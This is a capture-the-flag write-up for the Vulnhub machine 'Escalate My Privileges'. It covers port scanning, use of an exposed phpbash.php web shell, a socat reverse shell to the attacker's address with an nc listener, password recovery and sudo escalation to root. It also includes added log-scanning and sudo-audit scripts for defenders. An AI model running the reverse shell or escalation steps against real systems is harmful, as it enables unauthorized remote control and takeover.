[VLN] Escalate My Privileges

Today we are going to hack the Vulnhub machine called Escalate My Privileges: 1. You can download it from the following link: Escalate My Privileges

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 11:58 CEST
Nmap scan report for my_privilege.home (192.168.1.29)
Host is up (0.00051s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: 400 Bad Request
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35283/tcp6  nlockmgr
|   100021  1,3,4      45561/tcp   nlockmgr
|   100021  1,3,4      46989/udp6  nlockmgr
|   100021  1,3,4      49986/udp   nlockmgr
|   100024  1          44315/tcp   status
|   100024  1          49779/udp   status
|   100024  1          50120/udp6  status
|   100024  1          56075/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.54 seconds

If we look at the source code of the initial web page we see: alt="http://ip/phpbash.php"> The robots.txt also mentions phpbash.php, so we browse to: http://192.168.1.29/phpbash.php
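From the defender's side, the same path that gives us our foothold is also the easiest thing to spot in the web server's logs. The script below is an added example, not part of the original writeup: it scans Apache combined-format access log lines for requests to phpbash.php and counts hits per client. The log lines, client addresses and timestamps are constructed for the example; only the phpbash.php path comes from this box.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag requests to a known
# web-shell path in Apache combined-format access logs.
# The log lines below are constructed; the client IPs and timestamps are made up.

SAMPLE_LOG='192.168.1.148 - - [31/Mar/2020:12:01:07 +0200] "GET /robots.txt HTTP/1.1" 200 43 "-" "Mozilla/5.0"
192.168.1.148 - - [31/Mar/2020:12:01:19 +0200] "GET /phpbash.php HTTP/1.1" 200 8921 "-" "Mozilla/5.0"
192.168.1.148 - - [31/Mar/2020:12:02:03 +0200] "POST /phpbash.php HTTP/1.1" 200 512 "http://192.168.1.29/phpbash.php" "Mozilla/5.0"
192.168.1.50 - - [31/Mar/2020:12:05:44 +0200] "GET /index.html HTTP/1.1" 200 1270 "-" "curl/7.68.0"'

# Paths that should never be served from this host; phpbash.php is the one
# this box exposes. Add further names here as needed (space separated).
WEBSHELL_PATHS='/phpbash.php'

# Print "client_ip method path" for every request hitting a web-shell path.
webshell_hits() {
    printf '%s\n' "$1" | awk -v paths="$WEBSHELL_PATHS" '
        BEGIN { n = split(paths, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        {
            # In combined format field 6 is "METHOD (with the opening quote)
            # and field 7 is the request path.
            method = substr($6, 2); path = $7
            sub(/\?.*/, "", path)          # drop any query string before matching
            if (path in want) print $1, method, path
        }'
}

# Count hits per client IP so a single noisy source stands out.
hits_per_ip() {
    webshell_hits "$1" | awk '{ c[$1]++ } END { for (ip in c) print ip, c[ip] }'
}

# Show the result for the constructed sample.
echo "web-shell requests:"
webshell_hits "$SAMPLE_LOG"
echo "per client:"
hits_per_ip "$SAMPLE_LOG"
```

On a real server you would feed `/var/log/httpd/access_log` through the same functions (for example `webshell_hits "$(cat /var/log/httpd/access_log)"`); a 200 response to a path like this, as in the second and third sample lines, is the signal that the file is actually present and being used rather than merely probed for.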

Exploitation


Since we have access to the shell that phpbash.php gives us, we will use it to obtain a reverse shell. On our machine we run:

nc -nlvp 5555

In phpbash.php we run:

socat tcp-connect:192.168.1.148:5555 exec:sh,pty,stderr,setsid,sigint,sane

And we have our reverse shell. Let's take a look at the system.

sh-4.2$ cd /home
sh-4.2$ ls
armour
sh-4.2$ cd armour
sh-4.2$ ls
Credentials.txt  backup.sh  runme.sh
sh-4.2$ cat Credentials.txt
my password is
md5(rootroot1)

We see that the user armour has a Credentials.txt telling us how to obtain their password.

sml@Cassandra:~$ echo -n rootroot1 | md5sum
b7bc8489abe360486b4b19dbc242e885  -

We try to log in as armour with the credentials we obtained.

sh-4.2$ su armour
su armour
Password: b7bc8489abe360486b4b19dbc242e885

[armour@my_privilege ~]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)

We check whether the user can use sudo.

[armour@my_privilege ~]$ sudo -l
sudo -l
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,
        /usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,
        /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,
        /usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,
        /usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
        /usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
        /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,
        /usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
        /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,
        /usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
        /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,
        /usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
        /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,
        /usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
        /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,
        /usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
        /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,
        /usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
        /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,
        /usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
        /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,
        /usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
        /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,
        /usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
        /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,
        /usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,
        /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,
        /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,
        /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,
        /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,
        /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,
        /usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,
        /sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
        /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello

As we can see, there are many (very many) ways to escalate privileges and practice. In this writeup we will take the easy one :)

Privilege Escalation


As easy as...

[armour@my_privilege ~]$ sudo /bin/bash
[root@my_privilege armour]# id
id
uid=0(root) gid=0(root) groups=0(root)
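The reason a single `sudo /bin/bash` was enough is visible in the `sudo -l` output above: the rule grants a root shell, a long list of editors and interpreters, and does so with NOPASSWD. The script below is an added example, not part of the original writeup, that audits a rule in the form `sudo -l` prints it and flags every command that is a shell or can start other programs once it runs as root, then runs the same audit against a hardened rule. Both rule strings are constructed for the example: the weak one is a subset of the real output on this box, and the hardened one uses a hypothetical script path (/usr/local/sbin/rotate-logs.sh) that does not exist on the box.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a "sudo -l" style rule
# and flag every command that is, or can become, a root shell.
# Both rule strings are constructed here. The weak one is a subset of the real
# "sudo -l" output on this box; /usr/local/sbin/rotate-logs.sh is hypothetical.

WEAK_RULE='    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /usr/bin/nano, /usr/bin/awk, /usr/bin/find, /usr/bin/python,
        /usr/bin/cat, /usr/bin/head, /usr/bin/tail, /usr/bin/less'

# What the rule should look like: one fixed, non-interactive script, password
# still required (no NOPASSWD tag), nothing that can spawn another program.
HARDENED_RULE='    (root) /usr/local/sbin/rotate-logs.sh'

# Commands that are a shell outright.
SHELLS='/bin/sh /bin/bash /usr/bin/sh /usr/bin/bash /bin/dash /bin/zsh /bin/csh /bin/ksh'
# Editors, pagers and interpreters: once running as root they can start other programs.
ESCAPABLE='/usr/bin/nano /usr/bin/vim /usr/bin/vi /usr/bin/less /usr/bin/more /usr/bin/awk /usr/bin/find /usr/bin/python /usr/bin/perl /usr/bin/env'

# Print one command path per line: join wrapped lines, drop the "(runas)" spec
# and any "TAG:" words such as NOPASSWD:, then split the comma-separated list.
sudo_commands() {
    printf '%s\n' "$1" | tr '\n' ' ' \
        | sed 's/^ *([^)]*) *//; s/^\([A-Z]*: *\)*//; s/,/ /g' \
        | tr -s ' ' '\n' | sed '/^$/d'
}

# True when the rule carries the NOPASSWD tag.
nopasswd_rule() {
    printf '%s' "$1" | grep -q 'NOPASSWD:'
}

# Print "path CLASS" for every command that is a shell or can escape to one.
risky_sudo_commands() {
    sudo_commands "$1" | while IFS= read -r cmd; do
        case " $SHELLS " in *" $cmd "*) echo "$cmd SHELL"; continue ;; esac
        case " $ESCAPABLE " in *" $cmd "*) echo "$cmd ESCAPABLE" ;; esac
    done
}

# Number of risky entries; a sound rule yields 0.
risky_count() {
    risky_sudo_commands "$1" | wc -l | tr -d ' '
}

# Print a short report for one rule.
report() {
    if nopasswd_rule "$2"; then tag="NOPASSWD"; else tag="password required"; fi
    echo "$1: $tag, $(risky_count "$2") risky command(s)"
    risky_sudo_commands "$2" | sed 's/^/    /'
}

report "weak rule" "$WEAK_RULE"
report "hardened rule" "$HARDENED_RULE"
```

To audit the actual sudoers file rather than `sudo -l` output, strip the leading `user HOST=` part of each line first; the rest of the rule has the same shape. Anything the audit classifies as SHELL or ESCAPABLE should be replaced by a dedicated script that does only the privileged task, and NOPASSWD should be reserved for that script alone.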

End


And with that we are root on the machine :)